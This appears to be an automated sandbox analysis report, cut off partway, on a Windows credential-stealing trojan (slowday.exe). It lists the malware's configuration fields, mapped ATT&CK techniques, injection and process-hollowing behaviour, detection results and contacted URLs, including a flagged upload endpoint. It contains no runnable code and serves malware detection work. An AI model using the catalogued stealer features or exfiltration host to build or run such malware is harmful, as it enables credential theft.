            Source: RegAsm.exe, 00000001.00000002.505252954.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000001.00000000.241216625.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: winlogons.exe, 00000007.00000003.279364172.0000000003792000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: winlogons.exe, 00000007.00000003.277164673.0000000003790000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000008.00000000.279280828.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles
            Source: RegAsm.exe, 00000008.00000000.279668892.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: _Version_Mutex_Delivery_EmailUsername_EmailPassword_EmailServer_EmailPort_EmailSSL_FTPServer_FTPUsername_FTPPassword_FTPPort_FTPSFTP_ProxyURL_ProxySecret_PanelURL_PanelSecret_LogInterval_PasswordStealer_KeyStrokeLogger_ClipboardLogger_ScreenshotLogger_WebCamLogger_SystemInfo_Install_InstallLocation_InstallFolder_InstallFileName_InstallStartup_InstallStartupPersistance_HistoryCleaner_ZoneID_HideFile_MeltFile_Disablers_DisableTaskManager_DisableCommandPrompt_DisableRegEdit_ProcessProtection_ProcessElevation_AntiVirusKiller_BotKiller_AntiDebugger_ExecutionDelay_FakeMessageShow_FakeMessageTitle_FakeMessageText_FakeMessageIcon_WebsiteVisitor_WebsiteVisitorVisible_WebsiteVisitorSites_WebsiteBlocker_WebsiteBlockerSites_FileBinder_FileBinderFiles

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            Valid Accounts111
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		1
            System Time Discovery            		Remote Services11
            Archive Collected Data            		Exfiltration Over Other Network Medium1
            Encrypted Channel            		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default Accounts13
            Native API            		2
            Registry Run Keys / Startup Folder            		1
            Access Token Manipulation            		11
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		2
            File and Directory Discovery            		Remote Desktop Protocol1
            Data from Local System            		Exfiltration Over Bluetooth1
            Remote Access Software            		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain Accounts1
            Shared Modules            		Logon Script (Windows)412
            Process Injection            		2
            Obfuscated Files or Information            		1
            Credentials in Registry            		9
            System Information Discovery            		SMB/Windows Admin Shares1
            Email Collection            		Automated ExfiltrationSteganographyExploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)2
            Registry Run Keys / Startup Folder            		1
            Software Packing            		1
            Credentials In Files            		261
            Security Software Discovery            		Distributed Component Object Model21
            Input Capture            		Scheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            DLL Side-Loading            		LSA Secrets141
            Virtualization/Sandbox Evasion            		SSH2
            Clipboard Data            		Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common1
            Masquerading            		Cached Domain Credentials4
            Process Discovery            		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items141
            Virtualization/Sandbox Evasion            		DCSync1
            Application Window Discovery            		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
            Access Token Manipulation            		Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)412
            Process Injection            		/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 signatures2 2 Behavior Graph ID: 614362 Sample: slowday.exe Startdate: 23/04/2022 Architecture: WINDOWS Score: 100 42 Multi AV Scanner detection for domain / URL 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 48 12 other signatures 2->48 7 slowday.exe 4 2->7         started        10 winlogons.exe 2->10         started        process3 file4 36 C:\Users\user\AppData\...\winlogons.exe, PE32 7->36 dropped 38 C:\Users\user\AppData\...\winlogons.url, MS 7->38 dropped 13 RegAsm.exe 9 7->13         started        56 Antivirus detection for dropped file 10->56 16 RegAsm.exe 9 10->16         started        signatures5 process6 signatures7 58 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 13->58 60 Injects a PE file into a foreign processes 13->60 18 vbc.exe 13->18         started        21 vbc.exe 1 13->21         started        23 vbc.exe 1 13->23         started        25 vbc.exe 1 13->25         started        62 Writes to foreign memory regions 16->62 64 Allocates memory in foreign processes 16->64 66 Sample uses process hollowing technique 16->66 27 vbc.exe 16->27         started        29 vbc.exe 16->29         started        31 vbc.exe 1 16->31         started        34 2 other processes 16->34 process8 dnsIp9 50 Tries to steal Instant Messenger accounts or passwords 18->50 52 Tries to steal Mail credentials (via file / registry access) 18->52 54 Tries to harvest and steal browser information (history, passwords, etc) 29->54 40 192.168.2.1 unknown unknown 31->40 signatures10

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            slowday.exe75%VirustotalBrowse
            slowday.exe74%ReversingLabsWin32.Trojan.Autoit
            slowday.exe100%AviraDR/AutoIt.Gen8

            Dropped Files

            SourceDetectionScannerLabelLink
            C:\Users\user\AppData\Roaming\winlogons\winlogons.exe100%AviraDR/AutoIt.Gen8

            Unpacked PE Files

            SourceDetectionScannerLabelLinkDownload
            0.2.slowday.exe.dc0000.0.unpack100%AviraDR/AutoIt.Gen8Download File
            2.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            10.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            23.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            2.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            19.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            2.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            23.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            7.0.winlogons.exe.1280000.0.unpack100%AviraDR/AutoIt.Gen8Download File
            19.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            7.2.winlogons.exe.1280000.0.unpack100%AviraDR/AutoIt.Gen8Download File
            1.0.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            1.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            23.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            21.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            23.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            7.3.winlogons.exe.3790000.0.unpack100%AviraTR/Dropper.GenDownload File
            23.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            10.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            10.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            9.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            2.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            6.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            10.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            8.0.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            10.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            19.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            19.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            19.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            23.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            21.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            8.2.RegAsm.exe.400000.0.unpack100%AviraTR/Dropper.GenDownload File
            10.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            19.2.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            6.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            2.0.vbc.exe.400000.2.unpack100%AviraHEUR/AGEN.1227086Download File
            0.3.slowday.exe.3b50000.0.unpack100%AviraTR/Dropper.GenDownload File
            8.0.RegAsm.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
            0.0.slowday.exe.dc0000.0.unpack100%AviraDR/AutoIt.Gen8Download File
            23.0.vbc.exe.400000.5.unpack100%AviraHEUR/AGEN.1227086Download File
            2.0.vbc.exe.400000.1.unpack100%AviraHEUR/AGEN.1227086Download File
            10.0.vbc.exe.400000.4.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.0.unpack100%AviraHEUR/AGEN.1227086Download File
            1.0.RegAsm.exe.400000.1.unpack100%AviraTR/Dropper.GenDownload File
            19.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            9.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File
            2.0.vbc.exe.400000.3.unpack100%AviraHEUR/AGEN.1227086Download File

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
            https://a.pomf.cat/4%VirustotalBrowse
            https://a.pomf.cat/100%Avira URL Cloudphishing
            http://crl.pki.goog/GTS1O1core.crl00%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt00%URL Reputationsafe
            https://pki.goog/repository/00%URL Reputationsafe
            http://crl.pki.goog/gsr2/gsr2.crl0?0%URL Reputationsafe
            http://pki.goog/gsr2/GTSGIAG3.crt0)0%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt0#0%URL Reputationsafe
            http://pomf.cat/upload.php&https://a.pomf.cat/0%Avira URL Cloudsafe
            https://aefd.nelreports.net/api/report?cat=bingth0%URL Reputationsafe
            http://pomf.cat/upload.php8%VirustotalBrowse
            http://pomf.cat/upload.php100%Avira URL Cloudmalware
            http://crl.pki.goog/GTSGIAG3.crl00%URL Reputationsafe
            https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gt0%URL Reputationsafe
            http://pki.goog/gsr2/GTS1O1.crt0M0%URL Reputationsafe
            https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
            https://aefd.nelreports.net/api/report?cat=bingaot0%URL Reputationsafe

            Domains and IPs

            Contacted Domains

            No contacted domains info

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://www.msn.com/de-ch/entertainment/_h/c920645c/webcore/externalscripts/oneTrustV2/scripttemplatebhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
              		high
              https://www.google.com/chrome/static/images/folder-applications.svgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                		high
                https://www.google.com/chrome/static/css/main.v2.min.cssbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                  		high
                  https://www.google.com/chrome/static/images/fallback/google-chrome-logo.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                    		high
                    http://www.msn.combhvBB7.tmp.21.drfalse
                      		high
                      http://www.nirsoft.netvbc.exe, 00000002.00000002.260540499.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282611989.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299301709.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 0000000A.00000002.301868471.0000000000195000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320171342.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333176153.000000000019C000.00000004.00000010.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.346821134.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                        		high
                        https://deff.nelreports.net/api/report?cat=msnbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.dr, bhvAE74.tmp.6.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.com/chrome/static/images/chrome-logo.svgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                          		high
                          https://www.google.com/chrome/static/images/homepage/homepage_features.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                            		high
                            https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=6856811916691;gtm=vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343230278.000000000220F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                              		high
                              https://www.google.com/chrome/static/images/download-browser/big_pixel_phone.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                		high
                                https://www.google.com/chrome/vbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317103637.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330049242.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://a.pomf.cat/RegAsm.exe, 00000001.00000002.506893790.0000000002F63000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.506835059.0000000002B03000.00000004.00000800.00020000.00000000.sdmptrue
                                  • 4%, Virustotal, Browse
                                  • Avira URL Cloud: phishing
                                  		unknown
                                  https://2542116.fls.doubleclick.net/activityi;src22vbc.exe, 0000000A.00000002.302284910.00000000008F0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000013.00000002.320338542.0000000000B50000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000015.00000002.333369197.0000000000BA0000.00000004.00000020.00020000.00000000.sdmp, vbc.exe, 00000017.00000002.347050996.0000000000980000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/434d91f2e635/RCc13122162a9a46c3b4cbf05ffccde0fbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                      		high
                                      https://www.google.com/chrome/static/images/homepage/hero-anim-bottom-left.pngbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                        		high
                                        https://www.google.com/chrome/static/images/chrome_safari-behavior.jpgbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                          		high
                                          https://login.microsoftonline.com/common/oauth2/authorizeclient_id=9ea1ad79-fdb6-4f9a-8bc3-2b70f96e3vbc.exe, 00000002.00000003.258804359.00000000028EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.280774085.00000000027EB000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.297394519.000000000275B000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://maps.windows.com/windows-app-web-linkbhv2307.tmp.23.dr, bhvCA97.tmp.9.dr, bhvED61.tmp.19.dr, bhv8783.tmp.2.dr, bhvBB7.tmp.21.drfalse
                                              		high
                                              http://www.msn.com/?ocid=iehpvbc.exe, 00000002.00000003.258216058.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279640260.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296911055.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298255280.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317218748.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317159848.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330268926.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330228924.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343153268.0000000002203000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343183877.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343529640.0000000002203000.00000004.00000800.00020000.00000000.sdmp, bhv2307.tmp.23.drfalse
                                                		high
                                                https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=68568119166vbc.exe, 00000002.00000003.258299011.0000000002403000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000002.00000002.261431821.00000000028EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000002.282897476.00000000027EC000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000006.00000003.279720385.0000000002253000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000003.296935342.00000000009F3000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000009.00000002.299972783.000000000275C000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000A.00000003.298367793.0000000002273000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317442987.0000000000B13000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317243581.0000000000B1F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317551848.0000000000B16000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000013.00000003.317402049.0000000000B25000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330335206.0000000000B2F000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330749808.0000000000B35000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330801205.0000000000B23000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000015.00000003.330817825.0000000000B26000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 00000017.00000003.343596388.0000000002206000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 